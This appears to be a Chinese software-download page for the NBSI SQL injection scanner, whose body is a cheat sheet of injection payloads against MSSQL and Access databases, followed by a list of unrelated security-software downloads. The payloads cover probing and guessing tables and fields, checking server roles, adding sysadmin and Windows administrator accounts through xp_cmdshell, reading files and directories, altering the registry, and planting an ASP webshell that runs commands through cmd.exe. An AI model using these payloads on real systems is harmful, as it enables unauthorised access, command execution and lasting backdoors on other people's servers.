标签:
NBSI注入网站漏洞扫描专用工具是一款功能齐全的APP,由vb语言撰写的网站漏洞检测专用工具的名字,ASP注入网站漏洞扫描专用工具,尤其在sql server注入检验层面有较高的准确度。
NBSI详细介绍1.分辨是不是有注入
;and 1=1
;and 1=2
2.分析判断是不是mssql
;and user0
3.分辨数据库系统软件
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4.注入主要参数是标识符
and [查询条件] and =
5.检索时没过虑主要参数的
and [查询条件] and %=
6.猜数据库
;and (Select Count(*) from [数据库名])0
7.猜字段
;and (Select Count(字段名) from 数据库名)0
8.猜字段中纪录长短
;and (select top 1 len(字段名) from 数据库名)0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0
10.检测管理权限构造(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.加上mssql和体系的账号
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)解析xml文件目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(上步获得的paths)))
(2)解析xml文件目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询文档的內容
13.mssql中的sql语句
xp_regenumvalues 注册表文件根键, 子键
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以好几个记录集方法回到全部键值
xp_regread 根键,子键,键值名
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir 回到制订键的值
xp_regwrite 根键,子键, 值名, 值种类, 值
值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello 载入注册表文件
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName 删掉某一值
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssql内嵌函数公式
;and (select @@version)0 得到Windows的版本信息
;and user_name()=dbo 分辨当今系统软件的联接客户是否sa
;and (select user_name())0 爆当今系统软件的联接客户
;and (select db_name())0 获得当今联接的数据库
16.简约的webshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
要求的情况下,像这样子用:
http://ip/l.asp?c=dir
密码:www.itmop.com
加载全部内容
QQ电脑管家纯净版(QQguanjia)32MB60人在玩软件之家软件站为您提供QQ电脑管家纯净版(QQguanjia) 安卓版,手机版下载,QQ电脑管家纯净版(QQguanjia) apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载火绒安全软件20.2M26人在玩火绒互联网安全软件,火绒互联网安全软件是一款由10余年经验资深工程师主导研发并拥有完全自主知识产权的反病毒引擎,是国内少有的自主研发并保持每周活跃更新的新一代反病毒引擎。火绒安全软件以精准威胁情报驱动的理念全新开发的新一代终端安全软件,下面小编就给大家详细介绍一下,感兴趣的话就赶快下载吧~
下载BackTrack5 r3中文版iso3.09MB24人在玩软件之家软件站为您提供BackTrack5 r3中文版iso 安卓版,手机版下载,BackTrack5 r3中文版iso apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载网易安全中心 V20214.2MB24人在玩软件之家软件站为您提供网易安全中心 V2021 安卓版,手机版下载,网易安全中心 V2021 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载Mav Anti-Malware119.6M23人在玩Mav Anti-Malware(电脑安全软件),MavAnti-Malware电脑安全软件是一款优秀的安全软件,可防止病毒、勒索软件、木马等电脑被恶意软件攻击,让用户更加安心的使用电脑。软件能够实时各个应用,您可以免费下载。
下载腾讯电脑管家官方下载75.0M21人在玩本期小编给大家推荐的软件是QQ电脑管家,这是腾讯出品的集安全防护、系统清理、软件升级等功能为一体的免费电脑安全管理软件,最大的安全云库,全新的杀毒引擎,深度清理电脑垃圾,为电脑重回巅峰状态,更有账号宝专版,10倍提升QQ防盗号能力。腾讯电脑管家全面助您解决系统、软件、安全方面的一切难题。下面小编就给大家详细介绍一下,感兴趣的话就赶快下载吧~
下载Glarysoft Malware Hunter Pro(恶意程序扫描软件)下载 官方中文版80.6M21人在玩本期小编给大家推荐的软件是Glarysoft Malware Hunter Pro。Glarysoft Malware Hunter Pro是一款功能强大的恶意软件扫描软件,采用云引擎和小红伞引擎,能够快速且全面地扫描电脑中存在的恶意软件,并强力清除,防止潜在的威胁。下面小编就给大家详细介绍一下,感兴趣的话就赶快下载吧~
下载dll一键修复工具离线版 Win7/Win10372MB21人在玩软件之家软件站为您提供dll一键修复工具离线版 Win7/Win10 安卓版,手机版下载,dll一键修复工具离线版 Win7/Win10 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载360安全卫士免安装绿色版3.22MB21人在玩软件之家软件站为您提供360安全卫士免安装绿色版 安卓版,手机版下载,360安全卫士免安装绿色版 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载S.O.S Security Suite15.1M20人在玩S.O.S Security Suite(系统安全软件),SOSSecuritySuite是一款免费的系统安全软件,可帮助您摆脱恶意软件、广告软件和间谍软件,并防止被感染,没有广告,没有捆绑软件,没有间谍软件,您可以免费下载。
下载